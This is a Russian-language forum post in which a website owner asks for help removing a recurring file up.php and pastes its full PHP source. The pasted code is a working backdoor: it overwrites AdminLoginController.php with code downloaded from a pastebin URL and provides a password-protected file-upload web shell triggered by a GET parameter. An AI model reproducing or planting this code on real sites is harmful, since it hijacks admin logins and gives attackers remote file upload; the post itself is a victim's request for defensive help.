Здравствуйте, не могу никак удалить вредоносный код. Чищу, но при этом он снова появляется. Появляется файл up.php в корне сайта и в папке модулей.
На данный момент сайт работает. Я поменял права файла AdminLoginController.php только на чтение. Изменил все пароли. Но этот файл упорно продолжает появляться.
В сети информацию не нашел.
Вот содержимое этого файла.
<?php
echo "hacked by bajatax <br>";
$sss=array('/','../','../../','../../../','../../../../','../../../../../');
foreach($sss as $pa){
$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");
foreach($p1 as $path){
if (file_exists("$path"))
{
$html = @file_get_contents('https://pastebin.com/raw/1SMJWSTB');
$save=fopen($path,'w');
fwrite($save,$html);
echo "<br> ./done panel <br>";
}}}
if($_GET['bajatax']=="hous"){
echo '<center><font color="Red" size="4">';
echo " Files Upload BY Bajatax<br>";
/// Script Upload By bajatax \\\
if(isset($_POST['Submit']) && isset($_POST['pass'])){
$pass=md5($_POST['pass']);
if($pass=="4cdc6e86fd083752251903f4400d5257"){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
@chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload by Bajatax :D ==> $userfile_name</b></center></a>";
}
}
else{
echo "ikma khask pass hhh :v doz inbox www.fb.com/bajatax58 :p jib BTC o duz Khod u_f :p <br>";
}}
else{
echo'<form method="POST" action="#" enctype="multipart/form-data"><br>upload : <input type="file" name="image"><br> pass : <input type="password" name="pass" value="9lawi la3rftih :v "><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo "<br> hadi fkhatr ga3 l3chran houus :D <br>";
echo '</center></font>';
}
?>
